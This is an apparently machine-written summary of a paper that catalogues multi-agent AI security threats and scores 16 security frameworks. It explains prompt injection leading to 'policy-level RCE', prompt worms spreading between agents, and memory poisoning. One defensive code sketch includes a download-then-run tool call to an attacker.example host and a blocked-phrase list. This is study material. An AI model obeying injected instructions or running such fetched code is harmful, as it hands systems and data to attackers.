Security Considerations for Multi-agent Systems

📝 Paper Summary

Multi-agent AI Safety & Security

This study establishes a taxonomy of 193 distinct security threats for Multi-Agent Systems and empirically demonstrates that current frameworks like NIST AI RMF fail to cover emerging risks such as inter-agent memory poisoning.

Core Problem

Existing security frameworks (e.g., NIST AI RMF, MITRE ATLAS) assume single-agent properties (statelessness, bounded trust, determinism), failing to address the emergent, behavioral attack surfaces introduced by multi-agent coordination.

Why it matters:

Enterprise deployments now delegate authority to agents that schedule cloud operations and manage finances; compromising these agents enables 'policy-level RCE' without exploiting any code vulnerability
Multi-agent systems (MAS) share persistent memory and propagate context, allowing attacks like self-replicating prompt worms to spread across agent boundaries
Practitioners lack empirical data on which security frameworks actually cover these new agentic risks, leading to false confidence in traditional governance
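To make the propagation risk concrete, the sketch below treats agents and a shared memory store as nodes in a directed "who reads whose output" graph and computes which nodes a self-replicating payload could reach from one compromised agent. It is a minimal illustration, not the paper's method: the function `blast_radius`, the node names, and the topology are hypothetical, and it assumes every infected node faithfully copies the payload into its own output.

```python
from collections import deque

# Hypothetical topology: each node maps to the nodes whose output it reads.
# "shared_memory" is modeled as a node that coder writes into and billing reads.
EXAMPLE_TOPOLOGY: dict[str, set[str]] = {
    "planner": {"email_reader"},
    "coder": {"planner"},
    "shared_memory": {"coder"},
    "billing": {"shared_memory"},
    "reviewer": set(),
}


def blast_radius(reads_from: dict[str, set[str]], patient_zero: str) -> set[str]:
    """Return every node a self-replicating payload can reach from patient_zero.

    Assumes each infected node copies the payload into its own output, so the
    payload spreads from a producer to every node that reads that producer.
    """
    # Invert the "reads from" edges into "is read by" edges.
    readers: dict[str, set[str]] = {}
    for consumer, producers in reads_from.items():
        for producer in producers:
            readers.setdefault(producer, set()).add(consumer)

    # Breadth-first search over the "is read by" edges.
    infected = {patient_zero}
    queue = deque([patient_zero])
    while queue:
        node = queue.popleft()
        for reader in readers.get(node, set()):
            if reader not in infected:
                infected.add(reader)
                queue.append(reader)
    return infected


print(sorted(blast_radius(EXAMPLE_TOPOLOGY, "email_reader")))
# ['billing', 'coder', 'email_reader', 'planner', 'shared_memory']
```

In this toy graph, `billing` is reached only through the shared memory store, which is the cross-boundary path described above; `reviewer`, which consumes nothing upstream, stays clean.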

Concrete Example: In a 'Policy-level RCE' attack, an adversary injects a prompt that manipulates an agent's reasoning to invoke a valid tool (e.g., 'download code') rather than exploiting a software bug. Traditional guards miss this because the final natural language output looks benign, yet the agent has been commandeered to execute a malicious workflow sequence.
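The gap between output-level and behavior-level inspection can be sketched in a few lines. Everything here is a hypothetical illustration rather than a mechanism from the paper: the tool names `download_code` and `run_shell`, the blocked-phrase list, and the risky-pair policy are assumptions. A guard that only scans the final answer approves the run, while a guard that inspects the ordered tool-call trace flags the download-then-execute sequence.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ToolCall:
    tool: str
    argument: str


# Hypothetical policy: ordered tool pairs that are each valid on their own
# but dangerous in sequence (fetch untrusted code, then execute it).
RISKY_SEQUENCES = {("download_code", "run_shell")}

# Hypothetical phrase list for a naive output-only filter.
BLOCKED_PHRASES = ("rm -rf", "exfiltrate", "malware")


def output_guard(final_text: str) -> bool:
    """Return True (approve) if the final answer contains no blocked phrase."""
    lowered = final_text.lower()
    return not any(phrase in lowered for phrase in BLOCKED_PHRASES)


def trace_guard(calls: list[ToolCall]) -> bool:
    """Return True (approve) only if no risky ordered pair occurs in the trace."""
    seen: set[str] = set()
    for call in calls:
        if any((earlier, call.tool) in RISKY_SEQUENCES for earlier in seen):
            return False
        seen.add(call.tool)
    return True


# Injected instructions steered the agent into a valid but malicious workflow.
trace = [
    ToolCall("search_docs", "deployment guide"),
    ToolCall("download_code", "https://attacker.example/setup.py"),
    ToolCall("run_shell", "python setup.py"),
]
final_answer = "Done! Your environment is configured."

print(output_guard(final_answer))  # True: the text looks benign
print(trace_guard(trace))          # False: download-then-execute detected
```

A pairwise ordering check is about the simplest trace-level policy one could write; it is shown only to illustrate why benign-looking final text is not evidence of a benign workflow.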

Key Novelty

Comprehensive MAS Threat Taxonomy & Framework Gap Analysis

Systematically derives 193 specific multi-agent threats (e.g., 'Tool-mediated compromise', 'Approval Fatigue') distinct from single-agent risks via GenAI-assisted threat modeling
Quantitatively scores 16 major security frameworks (including NIST, OWASP, MITRE) against this new taxonomy to expose specific coverage gaps in areas like Non-Determinism and Data Leakage

Evaluation Highlights

OWASP Agentic Security Initiative leads all frameworks with 65.3% coverage of the identified MAS threats
Non-Determinism is the most under-addressed risk category, with a mean coverage score of only 1.231 out of 3 across all frameworks
Data Leakage risks in MAS (e.g., shared session context) are poorly covered, averaging a score of 1.340 out of 3

Breakthrough Assessment

9/10

Establishes the foundational taxonomy for the new field of Multi-Agent Security, exposing critical gaps in established standards like NIST and MITRE with systematic, if still preliminary, empirical evidence.

⚙️ Technical Details

Problem Definition

Setting: Security assessment of Multi-Agent Systems (MAS) exercising delegated tool authority and shared memory

Inputs: 16 existing AI security frameworks (e.g., NIST AI RMF, OWASP ASI, MITRE ATLAS)

Outputs: Coverage scores (0-3 scale) against a taxonomy of 193 MAS-specific threat items

Pipeline Flow

Knowledge Base Construction (Phase 1) → Threat Modeling (Phase 2) → Survey Planning (Phase 3) → Framework Scoring (Phase 4)

System Modules

Knowledge Base Construction (Methodology)

Aggregate technical details of production MAS (graph-based orchestration, vector DBs, NeMo Guardrails) to ground analysis

Model or implementation: N/A (Human + Literature Aggregation)

GenAI Threat Modeling (Methodology)

Derive candidate threats by prompting models to reason adversarially about the knowledge base

Model or implementation: Generative AI Model (Specific model not named)

Survey Planning & Scoring (Methodology)

Map threats to literature and score existing frameworks against the taxonomy

Model or implementation: Human Analyst

Novel Architectural Elements

Four-phase evaluation pipeline integrating GenAI threat discovery with human expert validation
Taxonomy structure differentiating 'Structural' single-agent risks from 'Behavioral/Emergent' multi-agent risks
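The hand-off between GenAI threat discovery and human validation can be pictured as a consolidation step that shrinks a large candidate pool (1,700 candidate threats, per the Reproducibility note) into a curated taxonomy. The sketch below is an assumption about how such a step might look, not the authors' procedure: the `Candidate` fields, the reviewer-set `mas_specific` flag, the title normalization, and the category labels are all hypothetical placeholders.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Candidate:
    title: str
    category: str        # placeholder label, not the paper's taxonomy
    mas_specific: bool   # hypothetical flag set by a human reviewer


def normalize(title: str) -> str:
    """Lowercase, replace punctuation with spaces, collapse whitespace."""
    cleaned = re.sub(r"[^a-z0-9 ]+", " ", title.lower())
    return " ".join(cleaned.split())


def consolidate(candidates: list[Candidate]) -> list[Candidate]:
    """Drop reviewer-rejected items, then merge near-duplicate titles per category."""
    kept: dict[tuple[str, str], Candidate] = {}
    for cand in candidates:
        if not cand.mas_specific:
            continue  # e.g. a purely single-agent risk
        key = (cand.category, normalize(cand.title))
        kept.setdefault(key, cand)  # first occurrence wins
    return list(kept.values())


pool = [
    Candidate("Shared memory poisoning", "memory", True),
    Candidate("Shared-Memory Poisoning!", "memory", True),
    Candidate("Jailbreak of a single chatbot", "injection", False),
    Candidate("Approval fatigue", "oversight", True),
]
print([c.title for c in consolidate(pool)])
# ['Shared memory poisoning', 'Approval fatigue']
```

String normalization only catches near-identical titles; semantically similar threats phrased differently would still need human judgment, which is the role the pipeline assigns to expert validation.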

Comparison to Prior Work

vs. NIST AI RMF: Focuses specifically on emergent MAS risks (e.g., inter-agent trust) rather than general AI lifecycle risks
vs. MITRE ATLAS: Identifies 'policy-level' attacks where no software vulnerability exists, whereas ATLAS often focuses on traditional adversarial ML
vs. Traditional AppSec: Addresses 'Policy-level RCE' where valid tool use is the attack vector, rather than code injection vulnerabilities

Limitations

Survey execution (Phase 4) is described as 'currently underway', so only early results are presented
Relies on GenAI for initial threat discovery, potentially biasing results towards known LLM failure modes
Scoring of frameworks involves subjective interpretation of framework capabilities against threat items

Reproducibility

The methodology is described in detail, but the specific prompts used for GenAI threat modeling and the full dataset of 1,700 candidate threats are not explicitly linked in the text. The list of 16 frameworks is provided.

📊 Experiments & Results

Evaluation Setup

Comparative analysis of security frameworks against the paper's own taxonomy of 193 MAS threats

Benchmarks:

Security Frameworks List (Coverage Analysis) [New]

Metrics:

Coverage Score (0-3 scale per item)
Percentage Coverage (Overall)
Statistical methodology: Not explicitly reported in the paper
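Because the aggregation is not spelled out, the sketch below shows one plausible way to turn per-item 0-3 scores into the two reported metrics. Two assumptions are labeled loudly: percentage coverage is taken as total score divided by the maximum possible score, and the four threat items and their scores are toy values, not data from the paper. Only the category names come from this summary.

```python
MAX_SCORE = 3  # each threat item is scored 0-3 against a framework


def category_means(scores: dict[str, int], category_of: dict[str, str]) -> dict[str, float]:
    """Mean 0-3 score per risk category for one framework."""
    grouped: dict[str, list[int]] = {}
    for item, score in scores.items():
        if not 0 <= score <= MAX_SCORE:
            raise ValueError(f"score for {item} out of range: {score}")
        grouped.setdefault(category_of[item], []).append(score)
    return {cat: sum(vals) / len(vals) for cat, vals in grouped.items()}


def percent_coverage(scores: dict[str, int]) -> float:
    """ASSUMPTION: coverage % = total score / maximum possible score * 100."""
    return 100 * sum(scores.values()) / (MAX_SCORE * len(scores))


# Toy data for illustration only (not the paper's scores).
category_of = {"T1": "Non-Determinism", "T2": "Non-Determinism",
               "T3": "Data Leakage", "T4": "Data Leakage"}
scores = {"T1": 1, "T2": 2, "T3": 3, "T4": 1}

means = category_means(scores, category_of)
print(means)                               # {'Non-Determinism': 1.5, 'Data Leakage': 2.0}
print(min(means, key=means.get))           # Non-Determinism (weakest category)
print(round(percent_coverage(scores), 1))  # 58.3
```

Under this normalized definition, the reported Non-Determinism mean of 1.231 corresponds to about 41% of the maximum score; a different definition (for example, the share of items scored above 0) would produce different percentages from the same per-item scores.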

Key Results

Comparative scoring of frameworks reveals significant gaps in covering multi-agent-specific threats.

Benchmark	Metric	Baseline	Reported	Δ
MAS Threat Taxonomy (OWASP ASI, top framework)	Coverage %	Not reported in the paper	65.3	Not reported in the paper
Non-Determinism Category	Mean Score (0-3)	2.00	1.231	-0.769
Data Leakage Category	Mean Score (0-3)	2.00	1.340	-0.660

Main Takeaways

No reviewed framework achieves majority coverage of any single risk category, indicating a systemic lack of readiness for MAS security
OWASP Agentic Security Initiative dominates the 'Design' phase coverage, while CDAO Toolkit leads in 'Development' and 'Operations'
Critical MAS-specific threats like 'Policy-level RCE' and 'Shared Memory Poisoning' are virtually unaddressed by traditional frameworks (NIST, MITRE)
Threats are classified into 9 categories (e.g., Agent-Tool Coupling, Trust Exploitation), with Non-Determinism being the weakest area across all frameworks

📚 Prerequisite Knowledge

Prerequisites

Understanding of Agentic AI architectures (ReAct, RAG, Tool use)
Familiarity with cybersecurity concepts (RCE, Injection, Privilege Escalation)
Knowledge of AI governance frameworks (NIST, OWASP)

Key Terms

MAS: Multi-Agent Systems—systems where multiple autonomous agents coordinate, share memory, and delegate tasks to achieve complex goals

Policy-level RCE: Policy-level Remote Code Execution—an attack where an adversary manipulates an agent's decision-making (policy) to misuse valid tools, achieving malicious effects without exploiting software vulnerabilities

OWASP ASI: OWASP Agentic Security Initiative—a security framework specifically focused on risks in agentic AI systems

RAG: Retrieval-Augmented Generation, a technique in which a model retrieves external documents to ground its answers; in MAS, this introduces risks of poisoning shared knowledge bases

MIG: Multi-Instance GPU, NVIDIA's hardware partitioning of a single GPU into isolated instances; the paper notes vulnerabilities where shared physical components (power, thermal) breach this isolation

Sidecar Proxy: A helper container that runs alongside an application container in the same Kubernetes pod and mediates its traffic; in MAS, compromising this proxy allows intercepting tool calls across an entire agent fleet

Prompt Injection: Malicious inputs designed to override an AI's instructions; in MAS, these can become self-replicating worms spreading between agents